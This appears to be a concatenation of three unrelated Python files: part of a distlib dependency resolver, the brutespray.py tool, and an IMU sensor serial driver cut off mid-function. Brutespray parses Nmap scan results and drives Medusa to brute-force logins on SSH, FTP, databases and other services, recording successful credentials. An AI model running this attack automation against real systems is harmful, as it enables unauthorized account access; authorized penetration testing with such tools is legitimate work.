s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(("cantreplace", provider, other, frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ":*:" in meta_extras:
meta_extras.remove(":*:")
# :meta: and :run: are implicitly included
meta_extras |= set([":test:", ":build:", ":dev:"])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug("passed %s as requirement", odist)
else:
dist = odist = self.locator.locate(requirement, prereleases=prereleases)
if dist is None:
raise DistlibException("Unable to locate %r" % requirement)
logger.debug("located %s", odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
# import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if meta_extras and dist in install_dists:
for key in ("test", "build", "dev"):
e = ":%s:" % key
if e in meta_extras:
ereqts |= getattr(dist, "%s_requires" % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug("No providers found for %r", r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug("Cannot satisfy %r", r)
problems.add(("unsatisfied", r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug(
"Adding %s to install_dists", provider.name_and_version
)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug(
"%s is a build-time dependency only.", dist.name_and_version
)
logger.debug("find done for %s", odist)
return dists, problems
|
brutespray.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from argparse import RawTextHelpFormatter
import readline, glob
import sys, time, os
import subprocess
import xml.dom.minidom
import re
import argparse
import argcomplete
import threading
import itertools
import tempfile
import shutil
from multiprocessing import Process
services = {}
loading = False
class colors:
white = "\033[1;37m"
normal = "\033[0;00m"
red = "\033[1;31m"
blue = "\033[1;34m"
green = "\033[1;32m"
lightblue = "\033[0;34m"
banner = colors.red + r"""
#@ @/
@@@ @@@
%@@@ @@@.
@@@@@ @@@@%
@@@@@ @@@@@
@@@@@@@ @ @@@@@@@
@(@@@@@@@% @@@@@@@ &@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@
@@@( @@@@@#@@@@@@@@@*@@@,@@@@@@@@@@@@@@@ @@@
@@@@@@ .@@@/@@@@@@@@@@@@@/@@@@ @@@@@@
@@@ @@@@@@@@@@@ @@@
@@@@* ,@@@@@@@@@( ,@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@.@@@@@@@@@@@@@@@ @@@
@@@@@@ @@@@@ @@@@@@
@@@@@@@@@@@@@
@@ @@@ @@
@@ @@@@@@@ @@
@@% @ @@
"""+'\n' \
+ r"""
██████╗ ██████╗ ██╗ ██╗████████╗███████╗███████╗██████╗ ██████╗ █████╗ ██╗ ██╗
██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔══██╗╚██╗ ██╔╝
██████╔╝██████╔╝██║ ██║ ██║ █████╗ ███████╗██████╔╝██████╔╝███████║ ╚████╔╝
██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ ╚════██║██╔═══╝ ██╔══██╗██╔══██║ ╚██╔╝
██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗███████║██║ ██║ ██║██║ ██║ ██║
╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
"""+'\n' \
+ '\n brutespray.py v1.6.4' \
+ '\n Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail' \
+ '\n Inspired by: Leon Johnson/@sho-luv' \
+ '\n Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net>\n' + colors.normal
#ascii art by: Cara Pearson
class tabCompleter(object):
def pathCompleter(self,text,state):
line = readline.get_line_buffer().split()
return [x for x in glob.glob(text+'*')][state]
def interactive():
t = tabCompleter()
singluser = ""
if args.interactive is True:
print (colors.white + "\n\nWelcome to interactive mode!\n\n" + colors.normal)
print (colors.red + "WARNING:" + colors.white + " Leaving an option blank will leave it empty and refer to default\n\n" + colors.normal)
print ("Available services to brute-force:")
for serv in services:
srv = serv
for prt in services[serv]:
iplist = services[serv][prt]
port = prt
plist = len(iplist)
print ("Service: " + colors.green + str(serv) + colors.normal + " on port " + colors.red + str(port) + colors.normal + " with " + colors.red + str(plist) + colors.normal + " hosts")
args.service = raw_input('\n' + colors.lightblue + 'Enter services you want to brute - default all (ssh,ftp,etc): ' + colors.red)
args.threads = raw_input(colors.lightblue + 'Enter the number of parallel threads (default is 2): ' + colors.red)
args.hosts = raw_input(colors.lightblue + 'Enter the number of parallel hosts to scan per service (default is 1): ' + colors.red)
if args.passlist is None or args.userlist is None:
customword = raw_input(colors.lightblue + 'Would you like to specify a wordlist? (y/n): ' + colors.red)
if customword == "y":
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.pathCompleter)
if args.userlist is None and args.username is None:
args.userlist = raw_input(colors.lightblue + 'Enter a userlist you would like to use: ' + colors.red)
if args.userlist == "":
args.userlist = None
if args.passlist is None and args.password is None:
args.passlist = raw_input(colors.lightblue + 'Enter a passlist you would like to use: ' + colors.red)
if args.passlist == "":
args.passlist = None
if args.username is None or args.password is None:
singluser = raw_input(colors.lightblue + 'Would to specify a single username or password (y/n): ' + colors.red)
if singluser == "y":
if args.username is None and args.userlist is None:
args.username = raw_input(colors.lightblue + 'Enter a username: ' + colors.red)
if args.username == "":
args.username = None
if args.password is None and args.passlist is None:
args.password = raw_input(colors.lightblue + 'Enter a password: ' + colors.red)
if args.password == "":
args.password = None
if args.service == "":
args.service = "all"
if args.threads == "":
args.threads = "2"
if args.hosts == "":
args.hosts = "1"
print colors.normal
NAME_MAP = {"ms-sql-s": "mssql",
"microsoft-ds": "smbnt",
"pcanywheredata": "pcanywhere",
"postgresql": "postgres",
"shell": "rsh",
"exec": "rexec",
"login": "rlogin",
"smtps": "smtp",
"submission": "smtp",
"imaps": "imap",
"pop3s": "pop3",
"iss-realsecure": "vmauthd",
"snmptrap": "snmp"}
def make_dic_gnmap():
global loading
global services
supported = ['ssh','ftp','postgres','telnet','mysql','ms-sql-s','shell',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp', 'smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
port = None
with open(args.file, 'r') as nmap_file:
for line in nmap_file:
for name in supported:
matches = re.compile(r'([0-9][0-9]*)/open/[a-z][a-z]*//' + name)
try:
port = matches.findall(line)[0]
except:
continue
ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', line)
tmp_ports = matches.findall(line)
for tmp_port in tmp_ports:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += ip
else:
services[name][tmp_port] = ip
else:
services[name] = {tmp_port:ip}
loading = True
def make_dic_xml():
global loading
global services
supported = ['ssh','ftp','postgresql','telnet','mysql','ms-sql-s','rsh',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp','smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
doc = xml.dom.minidom.parse(args.file)
for host in doc.getElementsByTagName("host"):
try:
address = host.getElementsByTagName("address")[0]
ip = address.getAttribute("addr")
eip = ip.encode("utf8")
iplist = eip.split(',')
except:
# move to the next host
continue
try:
status = host.getElementsByTagName("status")[0]
state = status.getAttribute("state")
except:
state = ""
try:
ports = host.getElementsByTagName("ports")[0]
ports = ports.getElementsByTagName("port")
except:
continue
for port in ports:
pn = port.getAttribute("portid")
state_el = port.getElementsByTagName("state")[0]
state = state_el.getAttribute("state")
if state == "open":
try:
service = port.getElementsByTagName("service")[0]
port_name = service.getAttribute("name")
except:
service = ""
port_name = ""
product_descr = ""
product_ver = ""
product_extra = ""
name = port_name.encode("utf-8")
tmp_port = pn.encode("utf-8")
if name in supported:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += iplist
else:
services[name][tmp_port] = iplist
else:
services[name] = {tmp_port:iplist}
loading = True
def brute(service,port,fname,output):
if args.userlist is None and args.username is None:
userlist = 'wordlist/'+service+'/user'
uarg = '-U'
elif args.userlist:
userlist = args.userlist
uarg = '-U'
elif args.username:
userlist = args.username
uarg = '-u'
if args.passlist is None and args.password is None:
passlist = 'wordlist/'+service+'/password'
parg = '-P'
elif args.passlist:
passlist = args.passlist
parg = '-P'
elif args.password:
passlist = args.password
parg = '-p'
if args.continuous:
cont = ''
else:
cont = '-F'
if service == "smtp":
aarg = "-m"
auth = "AUTH:LOGIN"
else:
aarg = ''
auth = ''
p = subprocess.Popen(['medusa', '-b', '-H', fname, uarg, userlist, parg, passlist, '-M', service, '-t', args.threads, '-n', port, '-T', args.hosts, cont, aarg, auth], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=-1)
out = "[" + colors.green + "+" + colors.normal + "] "
output_file = output + '/' + port + '-' + service + '-success.txt'
for line in iter(p.stdout.readline, b''):
print line,
sys.stdout.flush()
time.sleep(0.0001)
if 'SUCCESS' in line:
f = open(output_file, 'a')
f.write(out + line)
f.close()
def animate():
sys.stdout.write('\rStarting to brute, please make sure to use the right amount of ' + colors.green + 'threads(-t)' + colors.normal + ' and ' + colors.green + 'parallel hosts(-T)' + colors.normal + '... \n')
t_end = time.time() + 2
for c in itertools.cycle(['|', '/', '-', '\\']):
if not time.time() < t_end:
break
sys.stdout.write('\rOutput will be written to the folder: ./' + colors.green + args.output + colors.normal + "/ "+ c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\n\nBrute-Forcing... \n')
time.sleep(1)
def loading():
for c in itertools.cycle(['|', '/', '-', '\\']):
if loading == True:
break
sys.stdout.write('\rLoading File: ' + c)
sys.stdout.flush()
time.sleep(0.01)
def parse_args():
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, description=\
"Usage: python brutespray.py <OPTIONS> \n")
menu_group = parser.add_argument_group(colors.lightblue + 'Menu Options' + colors.normal)
menu_group.add_argument('-f', '--file', help="GNMAP or XML file to parse", required=False, default=None)
menu_group.add_argument('-o', '--output', help="Directory containing successful attempts", default="brutespray-output")
menu_group.add_argument('-s', '--service', help="specify service to attack", default="all")
menu_group.add_argument('-t', '--threads', help="number of medusa threads", default="2")
menu_group.add_argument('-T', '--hosts', help="number of hosts to test concurrently", default="1")
menu_group.add_argument('-U', '--userlist', help="reference a custom username file", default=None)
menu_group.add_argument('-P', '--passlist', help="reference a custom password file", default=None)
menu_group.add_argument('-u', '--username', help="specify a single username", default=None)
menu_group.add_argument('-p', '--password', help="specify a single password", default=None)
menu_group.add_argument('-c', '--continuous', help="keep brute-forcing after success", default=False, action='store_true')
menu_group.add_argument('-i', '--interactive', help="interactive mode", default=False, action='store_true')
menu_group.add_argument('-m', '--modules', help="dump a list of available modules to brute", default=False, action='store_true')
argcomplete.autocomplete(parser)
args = parser.parse_args()
if args.file is None and args.modules is False:
parser.error("argument -f/--file is required")
return args
if __name__ == "__main__":
print(banner)
args = parse_args()
supported = ['ssh','ftp','telnet','vnc','mssql','mysql','postgresql','rsh',
'imap','nntp','pcanywhere','pop3',
'rexec','rlogin','smbnt','smtp',
'svn','vmauthd','snmp']
#temporary directory for ip addresses
if args.modules is True:
print (colors.lightblue + "Supported Services:\n" + colors.green)
print ('\n'.join(supported))
print (colors.normal + "\n" )
try:
tmppath = tempfile.mkdtemp(prefix="brutespray-tmp")
except:
sys.stderr.write("\nError while creating brutespray temp directory.")
exit(4)
if not os.path.exists(args.output):
os.mkdir(args.output)
if os.system("command -v medusa > /dev/null") != 0:
sys.stderr.write("Command medusa not found. Please install medusa before using brutespray")
exit(3)
if args.file is None:
sys.exit(0)
if args.passlist and not os.path.isfile(args.passlist):
sys.stderr.write("Passlist given does not exist. Please check your file or path\n")
exit(3)
if args.userlist and not os.path.isfile(args.userlist):
sys.stderr.write("Userlist given does not exist. Please check your file or path\n")
exit(3)
if os.path.isfile(args.file):
try:
t = threading.Thread(target=loading)
t.start()
doc = xml.dom.minidom.parse(args.file)
make_dic_xml()
except:
make_dic_gnmap()
if args.interactive is True:
interactive()
animate()
if services == {}:
print ("\nNo brutable services found.\n Please check your Nmap file.")
else:
print ("\nError loading file, please check your filename.")
to_scan = args.service.split(',')
for service in services:
if service in to_scan or to_scan == ['all']:
for port in services[service]:
fname = tmppath + '/' +service + '-' + port
iplist = services[service][port]
f = open(fname, 'w+')
for ip in iplist:
f.write(ip + '\n')
f.close()
brute_process = Process(target=brute, args=(service,port,fname,args.output))
brute_process.start()
#need to wait for all of the processes to run...
#shutil.rmtree(tmppath, ignore_errors=False, onerror=None)
|
LpmsB2.py
|
import time
import serial
import threading
import struct
import sys
from datetime import datetime, timedelta
from LpmsConfig import *
from lputils import *
from LpmsConfigurationSettings import LpmsConfigurationSettings
#TODO:
# check serial port opened before executing commands
# add wait for ack routine
class LpmsB2(object):
TAG = "LPMSB2"
runOnce = True;
verbose = True
is_thread_running = False
sensor_configuration = LpmsConfigurationSettings()
PACKET_ADDRESS0 = 0
PACKET_ADDRESS1 = 1
PACKET_FUNCTION0 = 2
PACKET_FUNCTION1 = 3
PACKET_RAW_DATA = 4
PACKET_LRC_CHECK0 = 5
PACKET_LRC_CHECK1 = 6
PACKET_END = 7
PACKET_LENGTH0 = 8
PACKET_LENGTH1 = 9
current_length = 0
current_function = 0
current_address = 0
rx_state = PACKET_END
in_bytes = []
rx_buffer = []
raw_tx_data = []
rx_index = 0
lrc_check = 0
wait_for_ack = False
wait_for_data = False
is_sensor_connected = False
is_command_mode = False
config_register = 0
status_register = 0
imu_id = 0
timestamp = 0
frame_counter = 0
battery_level = 0
battery_voltage = 0
temperature = 0
acc_x = 0
acc_y = 0
acc_z = 0
gyr_x = 0
gyr_y = 0
gyr_z = 0
mag_x = 0
mag_y = 0
mag_z = 0
angular_vel_x = 0
angular_vel_y = 0
angular_vel_z = 0
quat_w = 0
quat_x = 0
quat_y = 0
quat_z = 0
euler_x = 0
euler_y = 0
euler_z = 0
linacc_x = 0
linacc_y = 0
linacc_z = 0
altitude = 0
pressure = 0
humidity = 0
# debug log
debug_log_size = 0
debug_log_size_index = 0
def __init__(self, port, baudrate):
self.port = port
self.baudrate = baudrate
self.__init_params()
def __clear_params(self):
self.current_length = 0
self.current_function = 0
self.current_address = 0
self.rx_state = self.PACKET_END
self.in_bytes = []
self.rx_buffer = []
self.raw_tx_data = []
self.rx_index = 0
self.lrc_check = 0
self.imu_id = 0
self.timestamp = 0
self.frame_counter = 0
self.battery_level = 0
self.battery_voltage = 0
self.temperature = 0
self.acc_x = 0
self.acc_y = 0
self.acc_z = 0
self.gyr_x = 0
self.gyr_y = 0
self.gyr_z = 0
self.mag_x = 0
self.mag_y = 0
self.mag_z = 0
self.angular_vel_x = 0
self.angular_vel_y = 0
self.angular_vel_z = 0
self.quat_w = 0
self.quat_x = 0
self.quat_y = 0
self.quat_z = 0
self.euler_x = 0
self.euler_y = 0
self.euler_z = 0
self.linacc_x = 0
self.linacc_y = 0
self.linacc_z = 0
self.altitude = 0
self.pressure = 0
self.humidity = 0
self.wait_for_ack = False
self.wait_for_data = False
def __init_params(self):
self.__clear_params()
def __thread_is_alive(self):
try:
return self.thread.isAlive()
except AttributeError:
return False
def __run(self):
""" Method that runs forever """
self.is_thread_running = True
while not self.quit:
self.is_sensor_connected = True
bytesToRead = self.serial_port.inWaiting()
if bytesToRead > 0:
reading = self.serial_port.read(bytesToRead)
#print reading
self.__parse(reading)
self.serial_port.close()
self.is_sensor_connected = False
self.is_thread_running = False
# TODO: add offset length check
def __convert_rxbytes_to_int16(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("h", ''.join(dataList[offset:offset+2]))
return i
def __convert_rxbytes_to_int(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("i", ''.join(dataList[offset:offset+4]))
return i
def __convert_rxbytes_to_float(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("f", ''.join(dataList[offset:offset+4]))
return i
def __convert_int16_to_txbytes(self, v):
"""
return bytesarray
"""
return struct.pack("h", v)
def __convert_int_to_txbytes(self, v):
"""
return bytesarray
"""
return struct.pack("i", v)
def __print_str_to_hex(self, s):
print ":".join("{:02x}".format(ord(c)) for c in s)
# Parser
def __parse_function(self):
cf = self.current_function
if cf == LPMS_ACK:
logd(self.TAG , "Received Ack")
self.wait_for_ack = False
elif cf == LPMS_NACK:
logd(self.TAG , "Received Nack")
self.wait_for_ack = False
elif cf == LPMS_GET_CONFIG:
self.config_register = self.__convert_rxbytes_to_int(0, self.rx_buffer)
print"{0:b}".format(self.config_register).zfill(32)
self.__parse_configuration_register(self.config_register)
self.wait_for_data = False
elif cf == LPMS_GET_SENSOR_DATA:
if self.sensor_configuration.sixteen_bit_data_enable:
self.__parse_sensor_data(16)
else:
self.__parse_sensor_data()
self.wait_for_data = False
elif cf == GET_BATTERY_LEVEL:
self.battery_level = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_CHARGING_STATUS:
self.chargingStatus = self.__convert_rxbytes_to_int(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_BATTERY_VOLTAGE:
self.battery_voltage = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_FIRMWARE_VERSION:
vmajor = self.__convert_rxbytes_to_int(8, self.rx_buffer)
vminor = self.__convert_rxbytes_to_int(4, self.rx_buffer)
vbuild = self.__convert_rxbytes_to_int(0, self.rx_buffer)
self.firmwareVersion = str(vmajor) + "." + str(vminor) + "." + str(vbuild)
self.wait_for_data = False
elif cf == GET_PING:
if self.sensor_configuration.timestamp_counter_mode_enable:
self.timestamp = self.__convert_rxbytes_to_int(0, self.rx_buffer)
else:
self.timestamp = self.__convert_rxbytes_to_float(0, self.rx_buffer)
elif cf == GET_TEMPERATURE:
self.temperature = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_DEBUG_LOGGING_STATUS:
self.debugLoggingStatus = self.__convert_rxbytes_to_int(0, self.rx_buffer)
logd(self.TAG , "Debug Logging Status: "+str(self.debugLoggingStatus))
self.wait_for_data = False
elif cf == GET_DEBUG_LOG_SIZE:
self.debug_log_size = self.__convert_rxbytes_to_int(0, self.rx_buffer) / 32
logd(self.TAG , "Debug Logging Size: "+str(self.debug_log_size))
self.wait_for_data = False
elif cf == GET_DEBUG_LOG:
log = str(self.__convert_rxbytes_to_int(0, self.rx_buffer)) + ','
log += str(float(self.__convert_rxbytes_to_int16(4, self.rx_buffer))/100) + ','
log += str(float(self.__convert_rxbytes_to_int16(6, self.rx_buffer))/1000) + ','
log += str(self.__convert_rxbytes_to_float(8, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(12, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(16, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(20, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(24, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(28, self.rx_buffer))
if self.debug_log_size_index == 0:
filename = "DebugLog-"+datetime.now().strftime("%Y%m%d-%H%M%S")+".csv"
logd(self.TAG , "Saving to "+ filename)
self.fo = open(filename, "wb")
self.startTime = datetime.now()
self.fo.write(log+'\n')
self.debug_log_size_index += 1
self.__update_progress(self.debug_log_size_index)
if self.debug_log_size_index >= self.debug_log_size:
self.fo.close()
dt = (datetime.now()-self.startTime).total_seconds()
print
logd(self.TAG , "Debug log download completed")
print "Elapsed time:", str(dt)
def __update_progress(self, progress):
percent = int(progress*100/self.debug_log_size)
sys.stdout.write("\rDownloading: %d%%, %d, %d" % (percent, progress, self.debug_log_size))
sys.stdout.flush()
def __parse(self, data):
self.lrcReceived = 0
for b in data:
if self.rx_state == self.PACKET_END:
if (b == ':'):
self.rx_state = self.PACKET_ADDRESS0
elif self.rx_state == self.PACKET_ADDRESS0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_ADDRESS1
elif self.rx_state == self.PACKET_ADDRESS1:
self.in_bytes.append(b)
self.current_address = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.imu_id = self.current_address
self.rx_state = self.PACKET_FUNCTION0
elif self.rx_state == self.PACKET_FUNCTION0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_FUNCTION1
elif self.rx_state == self.PACKET_FUNCTION1:
self.in_bytes.append(b)
self.current_function = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.rx_state = self.PACKET_LENGTH0
elif self.rx_state == self.PACKET_LENGTH0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_LENGTH1
elif self.rx_state == self.PACKET_LENGTH1:
self.in_bytes.append(b)
self.current_length = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.rx_state = self.PACKET_RAW_DATA
self.rx_index = 0
self.rx_buffer = []
elif self.rx_state == self.PACKET_RAW_DATA:
if self.rx_index == self.current_length:
self.lrc_check = self.current_address + self.current_function + self.current_length
self.lrc_check = self.lrc_check + sum([ord(c) for c in self.rx_buffer])
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_LRC_CHECK1
else:
# add length check
self.rx_buffer.append(b)
self.rx_index = self.rx_index + 1
elif self.rx_state == self.PACKET_LRC_CHECK1:
self.in_bytes.append(b)
self.lrcReceived = self.__convert_rxbytes_to_int16(0, self.in_bytes)
if self.lrcReceived == self.lrc_check:
self.__parse_function()
self.rx_state = self.PACKET_END
else:
self.rx_state = self.PACKET_END
"""
def __parse_sensor_data(self):
o = 0
r2d = 57.2958
if self.sensor_configuration.timestamp_counter_mode_enable:
self.timestamp = float(self.__convert_rxbytes_to_int(0, self.rx_buffer))
else:
self.timestamp = self.__convert_rxbytes_to_float(0, self.rx_buffer)
o += 4
self.frame_counter += 1
if self.sensor_configuration.gyro_enable:
self.gyr_x = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
self.gyr_y = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
self.gyr_z = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
if self.sensor_configuration.accelerometer_enable:
self.acc_x = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.acc_y = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.acc_z = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
if self.sensor_configuration.magnetometer_enable:
self.mag_x = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.mag_y = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.mag_z = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
if self.sensor_configuration.quaternion_enable:
self.quat_w = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.quat_x = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.quat_y = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.quat_z = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
if self.sensor_configuration.euler_enable:
self.euler_x = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
self.euler_y = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
self.euler_z = self.__convert_rxbytes_to_float(o, self.rx_buffer) * r2d
o += 4
if self.sensor_configuration.linear_acceleration_enable:
self.linacc_x = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.linacc_y = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
self.linacc_z = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
if self.sensor_configuration.pressure_enable:
self.pressure = self.__convert_rxbytes_to_float(o, self.rx_buffer)
o += 4
"""
def __parse_sensor_data(self, data_mode=32):
o = 0
r2d = 57.2958
if data_mode == 16:
converter = lambda offset, l: float(self.__convert_rxbytes_to_int16(offset, l)) / 1000.0
increment = 2
else:
converter = lambda offset, l: self.__convert_rxbytes_to_float(offset, l)
increment = 4
# TODO: Add timestamp counter mode/elapsed mode
self.timestamp = float(self.__convert_rxbytes_to_int(0, self.rx_buffer))
o += 4
if self.runOnce:
self.frame_counter = self.timestamp
self.runOnce = False
else:
self.frame_counter += 1
if self.sensor_configuration.gyro_enable:
self.gyr_x = converter(o, self.rx_buffer) * r2d
o += increment
self.gyr_y = converter(o, self.rx_buffer) * r2d
o += increment
self.gyr_z = converter(o, self.rx_buffer) * r2d
o += increment
if self.sensor_configuration.accelerometer_enable:
self.acc_x = converter(o, self.rx_buffer)
o += increment
self.acc_y = converter(o, self.rx_buffer)
o += increment
self.acc_z = converter(o, self.rx_buffer)
o += increment
if self.sensor_configuration.magnetometer_enable:
self.mag_x = converter(o, self.rx_buffer)
o += increment
self.mag_y = converter(o, self.rx_buffer)
o += increment
self.mag_z = converter(o, self.rx_buffer)
o += increment
# 100 Fixed point
if data_mode == 16:
self.mag_x *= 10
self.mag_y *= 10
self.mag_z *= 10
if self.sensor_configuration.angular_velocity_enable:
self.angular_vel_x = converter(o, self.rx_buffer) * r2d
o += increment
self.angular_vel_y = converter(o, self.rx_buffer) * r2d
o += increment
self.angular_vel_z = converter(o, self.rx_buffer) * r2d
o += increment
if self.sensor_configuration.quaternion_enable:
self.quat_w = converter(o, self.rx_buffer)
o += increment
self.quat_x = converter(o, self.rx_buffer)
o += increment
self.quat_y = converter(o, self.rx_buffer)
o += increment
self.quat_z = converter(o, self.rx_buffer)
o += increment
# 10000 Fixed point
if data_mode == 16:
self.quat_w /= 10
self.quat_x /= 10
self.quat_y /= 10
self.quat_z /= 10
if self.sensor_configuration.euler_enable:
self.euler_x = converter(o, self.rx_buffer) * r2d
o += increment
self.euler_y = converter(o, self.rx_buffer) * r2d
o += increment
self.euler_z = converter(o, self.rx_buffer) * r2d
o += increment
# 10000 Fixed point
if data_mode == 16:
self.euler_x/= 10
self.euler_y/= 10
self.euler_z/= 10
if self.sensor_configuration.linear_acceleration_enable:
self.linacc_x = converter(o, self.rx_buffer)
o += increment
self.linacc_y = converter(o, self.rx_buffer)
o += increment
self.linacc_z = converter(o, self.rx_buffer)
o += increment
if self.sensor_configuration.pressure_enable:
self.pressure = converter(o, self.rx_buffer)
o += increment
# 10 Fixed point
if data_mode == 16:
self.pressure *= 100
if self.sensor_configuration.altitude_enable:
